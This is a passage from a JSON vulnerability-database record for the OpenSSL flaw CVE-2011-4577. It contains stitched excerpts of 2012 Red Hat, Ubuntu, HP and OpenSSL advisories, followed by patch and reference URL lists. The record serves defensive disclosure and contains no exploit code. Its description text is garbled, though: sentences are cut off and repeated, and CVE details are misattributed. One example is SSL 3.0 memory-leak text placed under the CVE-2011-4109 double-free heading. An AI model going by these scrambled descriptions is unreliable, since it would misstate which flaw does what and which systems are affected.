6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-perl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-static-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-4108.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4576.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4577.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4619.html\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2012 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFPHySOXlSAg2UNWIIRAlYpAKCQCY5k4gZ5VKOHZekEaWFHDNjGZwCZAdR3\nCJl5iUxU4cxJLOsSBESSRVs=\n=PMiS\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Content-Disposition: inline\n\n==========================================================================Ubuntu Security Notice USN-1357-1\nFebruary 09, 2012\n\nopenssl vulnerabilities\n==========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 11.10\n- Ubuntu 11.04\n- Ubuntu 10.10\n- Ubuntu 10.04 LTS\n- Ubuntu 8.04 LTS\n\nSummary:\n\nMultiple vulnerabilities exist in OpenSSL that could expose\nsensitive information or cause applications to crash. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) binary and related cryptographic tools\n\nDetails:\n\nIt was discovered that the elliptic curve cryptography (ECC) subsystem\nin OpenSSL, when using the Elliptic Curve Digital Signature Algorithm\n(ECDSA) for the ECDHE_ECDSA cipher suite, did not properly implement\ncurves over binary fields. This could allow an attacker to determine\nprivate keys via a timing attack. This issue only affected Ubuntu 8.04\nLTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1945)\n\nAdam Langley discovered that the ephemeral Elliptic Curve\nDiffie-Hellman (ECDH) functionality in OpenSSL did not ensure thread\nsafety while processing handshake messages from clients. This\ncould allow a remote attacker to cause a denial of service via\nout-of-order messages that violate the TLS protocol. This issue only\naffected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu\n11.04. This could allow a remote\nattacker to recover plaintext. This could allow a remote\nattacker to cause a denial of service. This\ncould allow a remote attacker to cause a denial of service. This\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\nand Ubuntu 11.04. (CVE-2011-4109)\n\nIt was discovered that OpenSSL, in certain circumstances involving\nECDH or ECDHE cipher suites, used an incorrect modular reduction\nalgorithm in its implementation of the P-256 and P-384 NIST elliptic\ncurves. This issue only\naffected Ubuntu 8.04 LTS. This could allow a remote attacker\nto cause a denial of service. This could allow a remote attacker to cause a denial of\nservice. (CVE-2011-4619)\n\nAndrey Kulikov discovered that the GOST block cipher engine in OpenSSL\ndid not properly handle invalid parameters. This could allow a remote\nattacker to cause a denial of service via crafted data from a TLS\nclient. This issue only affected Ubuntu 11.10. (CVE-2012-0027)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 11.10:\n libssl1.0.0 1.0.0e-2ubuntu4.2\n openssl 1.0.0e-2ubuntu4.2\n\nUbuntu 11.04:\n libssl0.9.8 0.9.8o-5ubuntu1.2\n openssl 0.9.8o-5ubuntu1.2\n\nUbuntu 10.10:\n libssl0.9.8 0.9.8o-1ubuntu4.6\n openssl 0.9.8o-1ubuntu4.6\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.8\n openssl 0.9.8k-7ubuntu8.8\n\nUbuntu 8.04 LTS:\n libssl0.9.8 0.9.8g-4ubuntu3.15\n openssl 0.9.8g-4ubuntu3.15\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. Relevant releases/architectures:\n\nRHEV Hypervisor for RHEL-6 - noarch\n\n3. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. \n\nA heap overflow flaw was found in the way QEMU-KVM emulated the e1000\nnetwork interface card. A privileged guest user in a virtual machine whose\nnetwork interface is configured to use the e1000 emulated driver could use\nthis flaw to crash the host or, possibly, escalate their privileges on the\nhost. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2009-5029 and CVE-2011-4609 (glibc issues)\n\nCVE-2012-0056 (kernel issue)\n\nCVE-2011-4108 and CVE-2012-0050 (openssl issues)\n\nThis update also fixes the following bugs:\n\n* Previously, it was possible to begin a Hypervisor installation without\nany valid disks to install to. \n\nNow, if no valid disks are found for Hypervisor installation, a message is\ndisplayed informing the user that there are no valid disks for\ninstallation. (BZ#781471)\n\n* Previously, the user interface for the Hypervisor did not indicate\nwhether the system was registered with Red Hat Network (RHN) Classic or RHN\nSatellite. As a result, customers could not easily determine the\nregistration status of their Hypervisor installations. \n\nThe TUI has been updated to display the registration status of the\nHypervisor. (BZ#788223)\n\n* Previously, autoinstall would fail if the firstboot or reinstall options\nwere passed but local_boot or upgrade were not passed. Now, neither the\nlocal_boot or upgrade parameters are required for autoinstall. \n788225 - autoinstall fails when local_boot or upgrade not passed on command line\n788226 - rhev-hypervisor6 6.2 Update 2 Release bugzilla\n\n6. \n\nRelease Date: 2012-01-19\nLast Updated: 2012-01-19\n\n ------------------------------------------------------------------------------\n\nPotential Security Impact: Remote Denial of Service (DoS), unauthorized access\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP-UX OpenSSL. This vulnerability could be exploited remotely to create a Denial of Service (DoS) or to gain unauthorized access. \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08s. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2011-3210 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2011-4109 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 9.3\nCVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided upgrades to resolve this vulnerability. \nThe upgrades are available from the following location\nftp://ossl098s:Secure12@ftp.usa.hp.com\n\nHP-UX Release / Depot Name\n\nB.11.11 PA (32 and 64) / OpenSSL_A.00.09.08s.001_HP-UX_B.11.11_32+64.depot\n\nB.11.23 (PA and IA) / OpenSSL_A.00.09.08s.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (PA and IA) / OpenSSL_A.00.09.08s.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08s or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: Install revision A.00.09.08s.001 or subsequent\n\nHP-UX B.11.23\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: Install revision A.00.09.08s.002 or subsequent\n\nHP-UX B.11.31\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: Install revision A.00.09.08s.003 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) 19 January 2012 Initial release\n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in the title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2012 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \n\nDTLS Plaintext Recovery Attack (CVE-2011-4108)\n==============================================\n\nNadhem Alfardan and Kenny Paterson have discovered an extension of the \nVaudenay padding oracle attack on CBC mode encryption which enables an \nefficient plaintext recovery attack against the OpenSSL implementation\nof DTLS. Their attack exploits timing differences arising during\ndecryption processing. A research paper describing this attack can be\nfound at http://www.isg.rhul.ac.uk/~kp/dtls.pdf\n\nThanks go to Nadhem Alfardan and Kenny Paterson of the Information\nSecurity Group at Royal Holloway, University of London\n(www.isg.rhul.ac.uk) for discovering this flaw and to Robin Seggelmann\n\u003cseggelmann@fh-muenster.de\u003e and Michael Tuexen \u003ctuexen@fh-muenster.de\u003e\nfor preparing the fix. \n\nDouble-free in Policy Checks (CVE-2011-4109)\n============================================\n\nIf X509_V_FLAG_POLICY_CHECK is set in OpenSSL 0.9.8, then a policy\ncheck failure can lead to a double-free. The bug does not occur \nunless this flag is set. Users of OpenSSL 1.0.0 are not affected. \n\nThis flaw was discovered by Ben Laurie and a fix provided by Emilia\nKasper \u003cekasper@google.com\u003e of Google. This affects both clients and\nservers that accept SSL 3.0 handshakes: those that call SSL_CTX_new with\nSSLv3_{server|client}_method or SSLv23_{server|client}_method. It does\nnot affect TLS. This could include sensitive\ncontents of previously freed memory. \n\nHowever, in practice, most deployments do not use\nSSL_MODE_RELEASE_BUFFERS and therefore have a single write buffer per\nconnection. That write buffer is partially filled with non-sensitive,\nhandshake data at the beginning of the connection and, thereafter,\nonly records which are longer any any previously sent record leak any\nnon-encrypted data. This, combined with the small number of bytes\nleaked per record, serves to limit to severity of this issue. \n\nThanks to Adam Langley \u003cagl@chromium.org\u003e for identifying and fixing\nthis issue. \n\nMalformed RFC 3779 Data Can Cause Assertion Failures (CVE-2011-4577)\n====================================================================\n\nRFC 3779 data can be included in certificates, and if it is malformed,\nmay trigger an assertion failure. This could be used in a\ndenial-of-service attack. \n\nNote, however, that in the standard release of OpenSSL, RFC 3779\nsupport is disabled by default, and in this case OpenSSL is not\nvulnerable. Builds of OpenSSL are vulnerable if configured with \n\"enable-rfc3779\". \n\nThanks to Andrew Chi, BBN Technologies, for discovering the flaw, and\nRob Austein \u003csra@hactrn.net\u003e for fixing it. \n\nThanks to George Kadianakis \u003cdesnacked@gmail.com\u003e for identifying\nthis issue and to Adam Langley \u003cagl@chromium.org\u003e for fixing it. \n\nInvalid GOST parameters DoS Attack (CVE-2012-0027)\n===================================================\n\nA malicious TLS client can send an invalid set of GOST parameters\nwhich will cause the server to crash due to lack of error checking. \nThis could be used in a denial-of-service attack. \n\nOnly users of the OpenSSL GOST ENGINE are affected by this bug. \n\nThanks to Andrey Kulikov \u003camdeich@gmail.com\u003e for identifying and fixing\nthis issue. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20120104.txt\n\n", "sources": [ { "db": "NVD", "id": "CVE-2011-4577" }, { "db": "CERT/CC", "id": "VU#737740" }, { "db": "BID", "id": "51281" }, { "db": "VULMON", "id": "CVE-2011-4577" }, { "db": "PACKETSTORM", "id": "114105" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "109788" }, { "db": "PACKETSTORM", "id": "109073" }, { "db": "PACKETSTORM", "id": "169679" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2011-4577", "trust": 2.8 }, { "db": "CERT/CC", "id": "VU#737740", "trust": 2.2 }, { "db": "SECUNIA", "id": "57353", "trust": 1.1 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "LENOVO", "id": "LEN-24443", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201201-060", "trust": 0.6 }, { "db": "JUNIPER", "id": "JSA10659", "trust": 0.3 }, { "db": "BID", "id": "51281", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2011-4577", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "114105", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "114272", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "110482", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109053", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109614", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109788", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109073", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169679", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4577" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "114105" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "109788" }, { "db": "PACKETSTORM", "id": "109073" }, { "db": "PACKETSTORM", "id": "169679" }, { "db": "CNNVD", "id": "CNNVD-201201-060" }, { "db": "NVD", "id": "CVE-2011-4577" } ] }, "id": "VAR-201201-0312", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44401007833333334 }, "last_update_date": "2024-07-22T21:12:07.836000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "openssl-1.0.0f", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=42348" }, { "title": "openssl-0.9.8s", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=42347" }, { "title": "Red Hat: Important: rhev-hypervisor6 security and bug fix update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120109 - security advisory" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120059 - security advisory" }, { "title": "Debian CVElist Bug Report Logs: Potential DTLS crasher bug", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=42b9da1ce27bbcacbdb9142890b6ad6b" }, { "title": "Debian CVElist Bug Report Logs: CVE-2011-4354: OpenSSL 0.9.8g (32-bit builds) bug leaks ECC private keys", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=ea25fd33228ddfe870d0eb9177265369" }, { "title": "Amazon Linux AMI: ALAS-2012-038", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2012-038" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1357-1" }, { "title": "VMware Security Advisories: VMware vSphere and vCOps updates to third party libraries", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=ebfa7ecfec1f973ff975279d7fce2976" }, { "title": "git-vuln-finder", "trust": 0.1, "url": "https://github.com/cve-search/git-vuln-finder " }, { "title": "vuln-finder", "trust": 0.1, "url": "https://github.com/ananya-0306/vuln-finder " }, { "title": "git-vuln-2", "trust": 0.1, "url": "https://github.com/darknsparkly777s/git-vuln-2 " } ], "sources": [ { "db": "VULMON", "id": "CVE-2011-4577" }, { "db": "CNNVD", "id": "CNNVD-201201-060" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-399", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2011-4577" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "http://www.kb.cert.org/vuls/id/737740" }, { "trust": 1.5, "url": "http://www.openssl.org/news/secadv_20120104.txt" }, { "trust": 1.4, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041" }, { "trust": 1.4, "url": "http://support.apple.com/kb/ht5784" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004564" }, { "trust": 1.1, "url": "http://w3.efi.com/fiery" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2013/jun/msg00000.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-november/092905.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00017.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00018.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=132750648501816\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=134039053214295\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/57353" }, { "trust": 0.8, "url": "http://www.support.xerox.com/support/docucolor-242-252-260/downloads/enus.html?associatedproduct=fiery-exp260\u0026operatingsystem=win7x64" }, { "trust": 0.8, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4577" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4619" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4576" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4108" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://support.lenovo.com/us/en/solutions/len-24443" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4109" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0027" }, { "trust": 0.3, "url": "http://www.attachmate.com/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001530" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001529" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_potential_security_exposure_when_using_ibm_infosphere_streams_due_to_vulnerabilities_in_ibm_java_se_version_6_sdk6?lang=en_us" }, { "trust": 0.3, "url": "https://www14.software.ibm.com/webapp/iwm/web/prelogin.do?source=aixbp" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157565" }, { "trust": 0.3, "url": "http://blog.pfsense.org/?p=676" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21637929" }, { "trust": 0.3, "url": "https://www.ibm.com/connections/blogs/psirt/entry/security_bulletin_ibm_tivoli_netcool_system_service_monitors_application_service_monitors_is_affected_by_multiple_openssl_vulnerabilities?lang=en_us" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/1708.html" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/2502.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631429" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21626257" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651196" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156631" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156392" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157969" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161892" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161590" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650623" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643698" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas12088ececb530423186257b410072035e" }, { "trust": 0.3, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03383940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638022" }, { "trust": 0.3, "url": "https://www.ibm.com/support/docview.wss?uid=swg21619837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631322" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001560" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24030251" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24033501" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004323" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory3.asc" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2012-1306.html" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2012-1307.html" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2012-1308.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643442" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21625170" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651176" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21627934" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633107" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21635888" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638670" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643439" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643437" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15314.html" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15388.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15389.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15395.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15460.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15461.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643316" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2012-0013.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100158312" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100150578" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100156392" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.3, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0050" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1165" }, { "trust": 0.2, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/kb/docs/doc-11259" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2011-4577.html" }, { "trust": 0.2, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2011-4619.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2011-4576.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3210" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/399.html" }, { "trust": 0.1, "url": "https://www.rapid7.com/db/vulnerabilities/hpsmh-cve-2011-4577" }, { "trust": 0.1, "url": 